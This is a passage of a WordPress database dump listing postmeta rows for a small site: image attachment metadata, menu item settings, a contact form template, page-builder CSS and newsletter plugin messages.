80x280.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:23:\"slidebg23-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:23:\"slidebg23-1-450x143.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:23:\"slidebg23-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1177,2004,'_wp_attached_file','2014/07/favicon-1.png'),(1178,2004,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:16;s:6:\"height\";i:16;s:4:\"file\";s:21:\"2014/07/favicon-1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1179,2005,'_wp_attached_file','2014/06/testimonials-1-1.jpg'),(1180,2005,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1172;s:4:\"file\";s:28:\"2014/06/testimonials-1-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-300x183.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"testimonials-1-1-1024x625.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:625;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-768x469.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:469;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"testimonials-1-1-1536x938.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:938;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:30:\"testimonials-1-1-1670x1019.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:1019;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:29:\"testimonials-1-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-880x537.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:537;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-450x275.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:275;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:28:\"testimonials-1-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1181,2006,'_wp_attached_file','2014/09/rain-bg-1.jpg'),(1182,2006,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1142;s:4:\"file\";s:21:\"2014/09/rain-bg-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-300x178.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:178;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"rain-bg-1-1024x609.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:609;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-768x457.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:457;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:22:\"rain-bg-1-1536x914.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:914;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:22:\"rain-bg-1-1670x993.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:993;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:22:\"rain-bg-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-880x523.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:523;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-450x268.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:268;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:21:\"rain-bg-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1183,2006,'_wxr_import_parent','978'),(1184,1040,'_menu_item_type','custom'),(1185,1040,'_menu_item_menu_item_parent','0'),(1186,1040,'_menu_item_object_id','1040'),(1187,1040,'_menu_item_object','custom'),(1188,1040,'_menu_item_target',''),(1189,1040,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1190,1040,'_menu_item_xfn',''),(1191,1040,'_menu_item_url','http://frontpage_url/#about'),(1192,1041,'_menu_item_type','custom'),(1193,1041,'_menu_item_menu_item_parent','0'),(1194,1041,'_menu_item_object_id','1041'),(1195,1041,'_menu_item_object','custom'),(1196,1041,'_menu_item_target',''),(1197,1041,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1198,1041,'_menu_item_xfn',''),(1199,1041,'_menu_item_url','http://frontpage_url/#home'),(1200,1042,'_menu_item_type','custom'),(1201,1042,'_menu_item_menu_item_parent','0'),(1202,1042,'_menu_item_object_id','1042'),(1203,1042,'_menu_item_object','custom'),(1204,1042,'_menu_item_target',''),(1205,1042,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1206,1042,'_menu_item_xfn',''),(1207,1042,'_menu_item_url','http://frontpage_url/#works'),(1208,1043,'_menu_item_type','custom'),(1209,1043,'_menu_item_menu_item_parent','1040'),(1210,1043,'_menu_item_object_id','1043'),(1211,1043,'_menu_item_object','custom'),(1212,1043,'_menu_item_target',''),(1213,1043,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1214,1043,'_menu_item_xfn',''),(1215,1043,'_menu_item_url','http://frontpage_url/#what-we-do'),(1216,1044,'_menu_item_type','custom'),(1217,1044,'_menu_item_menu_item_parent','1040'),(1218,1044,'_menu_item_object_id','1044'),(1219,1044,'_menu_item_object','custom'),(1220,1044,'_menu_item_target',''),(1221,1044,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1222,1044,'_menu_item_xfn',''),(1223,1044,'_menu_item_url','http://frontpage_url/#facts'),(1224,1045,'_menu_item_type','custom'),(1225,1045,'_menu_item_menu_item_parent','0'),(1226,1045,'_menu_item_object_id','1045'),(1227,1045,'_menu_item_object','custom'),(1228,1045,'_menu_item_target',''),(1229,1045,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1230,1045,'_menu_item_xfn',''),(1231,1045,'_menu_item_url','http://frontpage_url/#team'),(1232,1046,'_menu_item_type','custom'),(1233,1046,'_menu_item_menu_item_parent','0'),(1234,1046,'_menu_item_object_id','1046'),(1235,1046,'_menu_item_object','custom'),(1236,1046,'_menu_item_target',''),(1237,1046,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1238,1046,'_menu_item_xfn',''),(1239,1046,'_menu_item_url','http://frontpage_url/#features'),(1242,1047,'_menu_item_type','custom'),(1243,1047,'_menu_item_menu_item_parent','0'),(1244,1047,'_menu_item_object_id','1047'),(1245,1047,'_menu_item_object','custom'),(1246,1047,'_menu_item_target',''),(1247,1047,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1248,1047,'_menu_item_xfn',''),(1249,1047,'_menu_item_url','http://frontpage_url/#services'),(1250,1048,'_menu_item_type','custom'),(1251,1048,'_menu_item_menu_item_parent','0'),(1252,1048,'_menu_item_object_id','1048'),(1253,1048,'_menu_item_object','custom'),(1254,1048,'_menu_item_target',''),(1255,1048,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1256,1048,'_menu_item_xfn',''),(1257,1048,'_menu_item_url','http://frontpage_url/#contact'),(1258,1049,'_menu_item_type','custom'),(1259,1049,'_menu_item_menu_item_parent','0'),(1260,1049,'_menu_item_object_id','1049'),(1261,1049,'_menu_item_object','custom'),(1262,1049,'_menu_item_target',''),(1263,1049,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1264,1049,'_menu_item_xfn',''),(1265,1049,'_menu_item_url','#'),(1266,1050,'_menu_item_type','custom'),(1267,1050,'_menu_item_menu_item_parent','0'),(1268,1050,'_menu_item_object_id','1050'),(1269,1050,'_menu_item_object','custom'),(1270,1050,'_menu_item_target',''),(1271,1050,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1272,1050,'_menu_item_xfn',''),(1273,1050,'_menu_item_url','#home'),(1274,1051,'_menu_item_type','custom'),(1275,1051,'_menu_item_menu_item_parent','0'),(1276,1051,'_menu_item_object_id','1051'),(1277,1051,'_menu_item_object','custom'),(1278,1051,'_menu_item_target',''),(1279,1051,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1280,1051,'_menu_item_xfn',''),(1281,1051,'_menu_item_url','http://frontpage_url/#prices'),(1282,1052,'_menu_item_type','custom'),(1283,1052,'_menu_item_menu_item_parent','0'),(1284,1052,'_menu_item_object_id','1052'),(1285,1052,'_menu_item_object','custom'),(1286,1052,'_menu_item_target',''),(1287,1052,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1288,1052,'_menu_item_xfn',''),(1289,1052,'_menu_item_url','#fashion'),(1290,1053,'_menu_item_type','custom'),(1291,1053,'_menu_item_menu_item_parent','0'),(1292,1053,'_menu_item_object_id','1053'),(1293,1053,'_menu_item_object','custom'),(1294,1053,'_menu_item_target',''),(1295,1053,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1296,1053,'_menu_item_xfn',''),(1297,1053,'_menu_item_url','#naturel'),(1298,1054,'_menu_item_type','custom'),(1299,1054,'_menu_item_menu_item_parent','0'),(1300,1054,'_menu_item_object_id','1054'),(1301,1054,'_menu_item_object','custom'),(1302,1054,'_menu_item_target',''),(1303,1054,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1304,1054,'_menu_item_xfn',''),(1305,1054,'_menu_item_url','#blues'),(1306,1055,'_menu_item_type','custom'),(1307,1055,'_menu_item_menu_item_parent','0'),(1308,1055,'_menu_item_object_id','1055'),(1309,1055,'_menu_item_object','custom'),(1310,1055,'_menu_item_target',''),(1311,1055,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1312,1055,'_menu_item_xfn',''),(1313,1055,'_menu_item_url','#animals'),(1314,1056,'_menu_item_type','custom'),(1315,1056,'_menu_item_menu_item_parent','0'),(1316,1056,'_menu_item_object_id','1056'),(1317,1056,'_menu_item_object','custom'),(1318,1056,'_menu_item_target',''),(1319,1056,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(1320,1056,'_menu_item_xfn',''),(1321,1056,'_menu_item_url','#contact'),(1322,2008,'_menu_item_type','post_type'),(1323,2008,'_menu_item_menu_item_parent','1918'),(1324,2008,'_menu_item_object_id','274'),(1325,2008,'_menu_item_object','post'),(1326,2008,'_menu_item_target',''),(1327,2008,'_menu_item_classes','a:1:{i:0;s:7:\"ex-link\";}'),(1328,2008,'_menu_item_xfn',''),(1329,2008,'_menu_item_url',''),(1332,2010,'_wp_attached_file','2020/10/log_file_2020-10-28__13-58-01.txt'),(1333,2011,'_form','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]'),(1334,2011,'_mail','a:8:{s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:51:\"[_site_title] <wordpress@highperformingstudent.com>\";s:4:\"body\";s:163:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:19:\"[_site_admin_email]\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(1335,2011,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:51:\"[_site_title] <wordpress@highperformingstudent.com>\";s:4:\"body\";s:105:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:29:\"Reply-To: [_site_admin_email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(1336,2011,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";}'),(1337,2011,'_additional_settings',NULL),(1338,2011,'_locale','en_US'),(1622,2109,'_wpb_shortcodes_custom_css','.vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}.vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}.vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}.vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759211052{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1516,2067,'_wpb_shortcodes_custom_css','.vc_custom_1603899826716{padding-top: 237px !important;padding-bottom: 237px !important;}.vc_custom_1603899245380{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #333333 !important;}.vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}.vc_custom_1406483332545{border-top-width: 1px !important;border-bottom-width: 1px !important;padding-bottom: 50px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}.vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}.vc_custom_1406709610245{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1410480231107{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}.vc_custom_1404037588724{padding-bottom: 70px !important;}.vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}.vc_custom_1409759211052{padding-bottom: 80px !important;}.vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}.vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}.vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1406709465308{padding-top: 60px !important;}.vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1406709472224{padding-top: 60px !important;}.vc_custom_1405099308623{margin-bottom: -250px !important;}'),(1657,2123,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3477;s:6:\"height\";i:1402;s:4:\"file\";s:31:\"2021/02/SamDemma-Logo-FINAL.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-300x121.png\";s:5:\"width\";i:300;s:6:\"height\";i:121;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"SamDemma-Logo-FINAL-1024x413.png\";s:5:\"width\";i:1024;s:6:\"height\";i:413;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-768x310.png\";s:5:\"width\";i:768;s:6:\"height\";i:310;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"SamDemma-Logo-FINAL-1536x619.png\";s:5:\"width\";i:1536;s:6:\"height\";i:619;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:32:\"SamDemma-Logo-FINAL-2048x826.png\";s:5:\"width\";i:2048;s:6:\"height\";i:826;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"SamDemma-Logo-FINAL-1670x673.png\";s:5:\"width\";i:1670;s:6:\"height\";i:673;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:32:\"SamDemma-Logo-FINAL-1170x500.png\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-880x380.png\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-880x355.png\";s:5:\"width\";i:880;s:6:\"height\";i:355;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-450x350.png\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-450x181.png\";s:5:\"width\";i:450;s:6:\"height\";i:181;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"square\";a:4:{s:4:\"file\";s:31:\"SamDemma-Logo-FINAL-450x450.png\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1635,2115,'text_updated','Thank you, your records have been updated!'),(1634,2115,'text_no_lists_selected','Please select at least one list.'),(1632,2115,'text_unsubscribed','You were successfully unsubscribed.'),(1633,2115,'text_not_subscribed','Given email address is not subscribed.'),(1398,2029,'_wp_attached_file','2020/10/output-onlinepngtools-e1603895860661.png'),(1399,2029,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:20;s:6:\"height\";i:20;s:4:\"file\";s:48:\"2020/10/output-onlinepngtools-e1603895860661.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1402,2029,'_edit_last','1'),(1403,2029,'_wp_page_template','default'),(1631,2115,'text_error','Oops. Something went wrong. Please try again later.'),(1629,2115,'text_required_field_missing','Please fill in the required fields.'),(1400,2029,'_edit_lock','1603895758:1'),(1401,2029,'_wp_attachment_backup_sizes','a:6:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:320;s:6:\"height\";i:320;s:4:\"file\";s:25:\"output-onlinepngtools.png\";}s:18:\"full-1603895828818\";a:3:{s:5:\"width\";i:12;s:6:\"height\";i:12;s:4:\"file\";s:40:\"output-onlinepngtools-e1603895828566.png\";}s:18:\"full-1603895837773\";a:3:{s:5:\"width\";i:12;s:6:\"height\";i:12;s:4:\"file\";s:40:\"output-onlinepngtools-e1603895828818.png\";}s:18:\"full-1603895843364\";a:3:{s:5:\"width\";i:12;s:6:\"height\";i:12;s:4:\"file\";s:40:\"output-onlinepngtools-e1603895837773.png\";}s:18:\"full-1603895847930\";a:3:{s:5:\"width\";i:12;s:6:\"height\";i:12;s:4:\"file\";s:40:\"output-onlinepngtools-e1603895843364.png\";}s:18:\"full-1603895860661\";a:3:{s:5:\"width\";i:25;s:6:\"height\";i:25;s:4:\"file\";s:40:\"output-onlinepngtools-e1603895854775.png\";}}'),(1630,2115,'text_already_subscribed','Given email address is already subscribed, thank you!'),(1409,623,'_edit_lock','1612373350:1'),(1410,623,'footer_widgets','default'),(1411,623,'rs_page_bg_color','#ffffff'),(1677,2136,'_wp_attached_file','2021/02/Untitled-design-79.png'),(1678,2136,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1792;s:6:\"height\";i:1195;s:4:\"file\";s:30:\"2021/02/Untitled-design-79.png\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Untitled-design-79-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"Untitled-design-79-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:30:\"Untitled-design-79-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:32:\"Untitled-design-79-1670x1114.png\";s:5:\"width\";i:1670;s:6:\"height\";i:1114;s:9: